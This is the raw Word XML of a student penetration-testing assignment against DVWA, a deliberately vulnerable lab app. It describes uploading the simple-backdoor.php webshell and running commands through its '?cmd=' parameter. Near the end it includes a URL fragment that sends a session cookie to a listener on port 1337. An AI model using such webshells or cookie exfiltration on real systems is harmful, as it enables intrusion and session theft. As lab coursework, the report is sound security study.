          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4846E14C" wp14:editId="480BD1B1">
            <wp:extent cx="5731510" cy="27692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6925" w14:textId="67AEF859" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FF3807" w14:textId="7100DF1F" w:rsidR="00B02C73" w:rsidRPr="00A31CAB" w:rsidRDefault="00030EEA" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030EEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I was unable to retreive a shell on my kali machine. After troubleshooting it seemed there was a problem with my kali machine. But after this shell would be received I would be able to run command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00030EEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>to my target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> web server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E12BBB" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714915E8" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23298698" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA60FB3" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796AEA8F" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A211692" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D4D980B" w14:textId="77777777" w:rsidR="006869B3" w:rsidRDefault="006869B3" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A44312" w14:textId="42DDAD49" w:rsidR="00A578F2" w:rsidRDefault="00B02C73" w:rsidP="00A578F2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File upload continued;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1A8D4" w14:textId="354880A0" w:rsidR="00B02C73" w:rsidRPr="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to do this that I found was finding a webshell based inside Kali called </w:t>
      </w:r>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>simple-backdoor.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">I moved this to my current working directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A3178" w14:textId="233AF8DB" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2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2869AD98" wp14:editId="39242F91">
            <wp:extent cx="5731510" cy="26835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2DCB" w14:textId="33C7DB80" w:rsidR="00030EEA" w:rsidRDefault="00030EEA" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FEF154" w14:textId="3C0B2D06" w:rsidR="00030EEA" w:rsidRPr="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Then I uploaded this file to DVWA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B03AA" w14:textId="13CB144D" w:rsidR="00030EEA" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1154A1D1" wp14:editId="423178C6">
            <wp:extent cx="5731510" cy="18097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3067"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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68EA2" w14:textId="58811D07" w:rsidR="00B02C73" w:rsidRPr="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>and executed the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66F16C" w14:textId="37589CB4" w:rsidR="00030EEA" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8081A0" wp14:editId="19431209">
            <wp:extent cx="5731510" cy="2079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A28E" w14:textId="34E1FE32" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE1A1D3" w14:textId="106B9C5F" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Which showed me this webpage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5AA2F6" w14:textId="3C1B0FBF" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AAE9C0" wp14:editId="4FE4861D">
            <wp:extent cx="5731510" cy="91757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E448" w14:textId="5C565856" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">By adding this to the webpage search </w:t>
      </w:r>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>?cmd=</w:t>
      </w:r>
      <w:r w:rsidR="00222695" w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> I was prompted with the following; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C512F" w14:textId="3929D2BA" w:rsidR="00B02C73" w:rsidRPr="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02C73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1485ED89" wp14:editId="6988B1D4">
            <wp:extent cx="5731510" cy="404558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CE8C" w14:textId="77777777" w:rsidR="006869B3" w:rsidRPr="006869B3" w:rsidRDefault="006869B3" w:rsidP="006869B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006869B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E4D170" w14:textId="77777777" w:rsidR="006869B3" w:rsidRPr="006869B3" w:rsidRDefault="006869B3" w:rsidP="006869B3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006869B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Throughout my testing I went through a few types of attacks which an attacker could use to find vunerbilites in a website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22C43D" w14:textId="494383D6" w:rsidR="00B02C73" w:rsidRPr="006869B3" w:rsidRDefault="006869B3" w:rsidP="006869B3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006869B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>After completing these tests I found that many of these can easily be exploited by not only a security professional but any individual (especially on low settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E9301" w14:textId="77777777" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6845130E" w14:textId="77777777" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F511F1" w14:textId="77777777" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DDCC2A" w14:textId="77777777" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288FEF74" w14:textId="102475CA" w:rsidR="00B02C73" w:rsidRDefault="00B02C73" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C76E51" w14:textId="3AE01283" w:rsidR="0089488A" w:rsidRDefault="0089488A" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4132F372" w14:textId="5AB23DAB" w:rsidR="0089488A" w:rsidRDefault="0089488A" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F4C07C" w14:textId="02891617" w:rsidR="0089488A" w:rsidRDefault="0089488A" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602116F2" w14:textId="707A214A" w:rsidR="0089488A" w:rsidRDefault="0089488A" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185C1536" w14:textId="77777777" w:rsidR="0089488A" w:rsidRDefault="0089488A" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC182DC" w14:textId="61DEFC0D" w:rsidR="006869B3" w:rsidRPr="006869B3" w:rsidRDefault="006869B3" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006869B3" w:rsidRPr="006869B3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80D95" w14:textId="77777777" w:rsidR="00F83F92" w:rsidRDefault="00F83F92" w:rsidP="00F83F92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5017C9BE" w14:textId="77777777" w:rsidR="00F83F92" w:rsidRDefault="00F83F92" w:rsidP="00F8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934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53607" w14:textId="645BA0BA" w:rsidR="00A578F2" w:rsidRDefault="00A578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9AFBE" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A5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F79C" w14:textId="77777777" w:rsidR="00F83F92" w:rsidRDefault="00F83F92" w:rsidP="00F83F92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="785B20F4" w14:textId="77777777" w:rsidR="00F83F92" w:rsidRDefault="00F83F92" w:rsidP="00F8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564AC" w14:textId="1209F97B" w:rsidR="00F83F92" w:rsidRDefault="00F83F92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Aslam Patel</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t xml:space="preserve">Network Penetration Testing </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="23B497FC" w14:textId="4A05F60F" w:rsidR="00F83F92" w:rsidRDefault="00F83F92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t xml:space="preserve">Assignment 2 </w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>Website Attac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7" o:spid="_x0000_i1026" type="#_x0000_t75" style="width:75.75pt;height:16.85pt;visibility:visible;mso-wrap-style:square" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="" croptop="5958f" cropbottom="10723f"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4E72344F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0302DC0C"/>
    <w:lvl w:ilvl="0" w:tplc="57EA2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C4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0E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61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89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07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00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4C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50B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9131F6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5DCB8CE"/>
    <w:lvl w:ilvl="0" w:tplc="2C3C7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C8"/>
    <w:rsid w:val="000205F7"/>
    <w:rsid w:val="00030EEA"/>
    <w:rsid w:val="000460F2"/>
    <w:rsid w:val="000A1A1C"/>
    <w:rsid w:val="00160E76"/>
    <w:rsid w:val="00213B49"/>
    <w:rsid w:val="00222695"/>
    <w:rsid w:val="002C5E67"/>
    <w:rsid w:val="002F531E"/>
    <w:rsid w:val="00334C4C"/>
    <w:rsid w:val="0039380A"/>
    <w:rsid w:val="00503883"/>
    <w:rsid w:val="00651E21"/>
    <w:rsid w:val="006869B3"/>
    <w:rsid w:val="006A54A7"/>
    <w:rsid w:val="006B5FC8"/>
    <w:rsid w:val="00704CA6"/>
    <w:rsid w:val="007427D2"/>
    <w:rsid w:val="00743679"/>
    <w:rsid w:val="007F1736"/>
    <w:rsid w:val="007F2E07"/>
    <w:rsid w:val="0080332A"/>
    <w:rsid w:val="00816A68"/>
    <w:rsid w:val="00867068"/>
    <w:rsid w:val="00870BCD"/>
    <w:rsid w:val="0089488A"/>
    <w:rsid w:val="00992BC8"/>
    <w:rsid w:val="00A05EAE"/>
    <w:rsid w:val="00A07C47"/>
    <w:rsid w:val="00A31CAB"/>
    <w:rsid w:val="00A578F2"/>
    <w:rsid w:val="00AA7691"/>
    <w:rsid w:val="00AE3900"/>
    <w:rsid w:val="00B02C73"/>
    <w:rsid w:val="00BF4D83"/>
    <w:rsid w:val="00CF063B"/>
    <w:rsid w:val="00D06A50"/>
    <w:rsid w:val="00E57660"/>
    <w:rsid w:val="00EB6C97"/>
    <w:rsid w:val="00ED52EE"/>
    <w:rsid w:val="00F26C4E"/>
    <w:rsid w:val="00F773E6"/>
    <w:rsid w:val="00F83F92"/>
    <w:rsid w:val="00FB0A68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B8FABA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3BFE82C3-F6D9-44D0-AA86-6B3BBBA7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F92"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F83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F92"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00870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A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2.15:1337/?cookie=security=medium;%20PHPSESSID=rmknc47b6vp02rgou1fk5v15u6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B400-BF3B-4720-BCF2-E1FEC42A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m</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>aslam</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-15T16:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-15T16:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>